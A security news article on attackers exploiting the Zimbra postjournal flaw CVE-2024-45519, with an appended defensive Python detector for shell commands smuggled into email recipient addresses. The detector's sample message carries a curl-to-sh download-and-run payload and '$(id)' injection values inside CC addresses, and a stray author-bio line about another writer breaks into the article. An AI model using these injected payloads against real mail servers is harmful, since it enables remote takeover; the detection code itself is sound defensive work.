Attackers are actively targeting a severe remote code execution vulnerability that Zimbra recently disclosed in its SMTP server, heightening the urgency for affected organizations to patch vulnerable instances right away.

The bug, identified as CVE-2024-45519, is present in the Zimbra postjournal service component for email journaling and archiving. It allows an unauthenticated remote attacker to execute arbitrary commands on a vulnerable system and take control of it. Zimbra issued updates for affected versions last week but has not released any details of the flaw so far.

Researchers at Proofpoint this week reported observing attacks targeting the flaw beginning in late September. They identified the issue as stemming from a failure to properly sanitize user input, thereby enabling attackers to inject arbitrary commands. The attackers can use it to download and run malicious code on a vulnerable system, Proofpoint said.

In a series of posts on X, the security vendor described the attackers as sending spoofed emails that look like they are from Gmail to vulnerable Zimbra servers. "Some emails from the same sender used a series of CC'd addresses attempting to build a Web shell on a vulnerable Zimbra server," Proofpoint said. This code is crafted to trick Zimbra into running it as shell commands, rather than processing it as a regular email address. The technique could potentially allow attackers to execute unauthorized commands on affected Zimbra servers, Proofpoint said. The Web shell allows the attacker to remotely access the server via specially crafted HTTP requests and to modify files, access sensitive data, and execute other arbitrary commands.

Notably, the threat actor is using the same server for sending the exploit emails and hosting the second-stage payload, which suggests a relatively immature operation, says Greg Lesnewich, threat researcher at Proofpoint. "It speaks to the fact that the actor does not have a distributed set of infrastructure to send exploit emails and handle infections after successful exploitation," Lesnewich says. He adds that the volume of attacks has remained roughly the same since they began last week and that they appear to be more opportunistic in nature than targeted.

Zimbra has been a recurring target. Last year, for instance, researchers found as many as four Chinese advanced persistent threat actors leveraging a Zimbra zero-day (CVE-2023-37580) to target government agencies worldwide. Last February, researchers at W Labs spotted North Korea's prolific Lazarus Group attempting to steal intelligence from organizations in the healthcare and energy sectors by targeting unpatched Zimbra servers.

Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics.
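The attack pattern Proofpoint describes above (shell commands carried in CC'd recipient addresses, then executed by a component that fails to sanitize them) lends itself to a simple check on inbound mail and to a contrast between the unsafe and the hardened way of handing an address to a subprocess. The block below is an added example, not Proofpoint's detection logic and not Zimbra's postjournal code. The exact payload format used against CVE-2024-45519 is not described on this page, so the check is a generic heuristic: an address is flagged when its local part contains characters RFC 5322 forbids outside a quoted string, or sequences a POSIX shell would interpret. The sample message, the IP address and the `/usr/local/bin/deliver` tool path are constructed for illustration.

```python
"""Heuristic check for shell-command payloads smuggled into SMTP recipient
addresses.  Added example: not Proofpoint's detection rule and not Zimbra code.
"""
from __future__ import annotations

import re
from email import message_from_string
from email.utils import getaddresses

# Unquoted local part: RFC 5322 dot-atom (atext separated by single dots).
_ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+"
_DOT_ATOM = re.compile(rf"^{_ATEXT}(?:\.{_ATEXT})*$")
# Quoted local part: anything but an unescaped double quote.
_QUOTED_STRING = re.compile(r'^"(?:[^"\\]|\\.)*"$')

# Sequences meaningful to /bin/sh.  `$`, backtick and `|` are legal atext, so
# an RFC syntax check alone lets them through; this list is the second gate.
_SHELL_MARKERS = ("$(", "${", "`", "|", ";", "&&", "||")
_SUBSTITUTION_MARKERS = ("$(", "${", "`")


def suspicious_reasons(addr: str) -> list[str]:
    """Explain why an addr-spec looks like an injection attempt; [] if benign."""
    local, at, domain = addr.rpartition("@")
    if not at or not local or not domain:
        return ["not an addr-spec"]
    reasons = []
    if not (_DOT_ATOM.match(local) or _QUOTED_STRING.match(local)):
        reasons.append("local part violates RFC 5322")
    hits = [m for m in _SHELL_MARKERS if m in local]
    if hits:
        reasons.append("shell metacharacters: " + " ".join(hits))
    return reasons


def scan_message(raw_message: str) -> dict:
    """Scan the To/Cc/Bcc headers of an RFC 5322 message.

    Returns {"addresses": {addr: [reasons]}, "raw_header_markers": [markers]}.
    The raw-header pass exists because a liberal address parser can normalise
    a payload away (an unquoted "(id)" is parsed as a comment, for instance),
    hiding it from the per-address check.
    """
    msg = message_from_string(raw_message)
    headers = []
    for name in ("To", "Cc", "Bcc"):
        headers.extend(msg.get_all(name, []))
    flagged = {}
    for _display_name, addr in getaddresses(headers):
        if not addr:  # strict parsers return ('', '') for malformed input
            continue
        reasons = suspicious_reasons(addr)
        if reasons:
            flagged[addr] = reasons
    raw_hits = sorted({m for h in headers for m in _SUBSTITUTION_MARKERS if m in h})
    return {"addresses": flagged, "raw_header_markers": raw_hits}


def vulnerable_delivery_command(addr: str) -> str:
    """The anti-pattern: header data interpolated into a string that is later
    handed to a shell (shell=True, os.system, a wrapper script).  A quoted
    local part such as "$(id)" is then expanded by sh.  Hypothetical tool path."""
    return f"/usr/local/bin/deliver --recipient {addr}"


def safe_delivery_argv(addr: str) -> list[str]:
    """Hardened form: validate first, then pass the address as one argv element
    so no shell ever parses it.  Run with subprocess.run(argv), no shell=True."""
    reasons = suspicious_reasons(addr)
    if reasons:
        raise ValueError(f"refusing {addr!r}: {'; '.join(reasons)}")
    return ["/usr/local/bin/deliver", "--recipient", addr]


# Constructed sample (not a captured message): a Gmail-looking sender and
# CC'd addresses whose quoted local parts carry shell commands.
SAMPLE_MESSAGE = """\
From: "Account Team" <someone@gmail.com>
To: admin@example.com
Cc: ops@example.com, "$(curl -s http://203.0.113.5/x | sh)"@example.com, "a;id"@example.com
Subject: constructed test

hello
"""

if __name__ == "__main__":
    result = scan_message(SAMPLE_MESSAGE)
    for flagged_addr, why in result["addresses"].items():
        print(f"FLAG {flagged_addr}: {', '.join(why)}")
    print("raw header markers:", result["raw_header_markers"])
    print("what a shell would see:", vulnerable_delivery_command('"$(id)"@example.com'))
```

On the sample, `ops@example.com` and `admin@example.com` pass and the two quoted payload addresses are flagged; the raw-header pass independently reports the `$(` substitution marker. The second check matters because both flagged addresses are syntactically valid RFC 5322 quoted local parts, which is exactly why a receiving component that validates syntax but then interpolates the string into a shell command is exposed.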
This Cyber News was published on www.darkreading.com. Publication date: Tue, 01 Oct 2024 21:45:11 +0000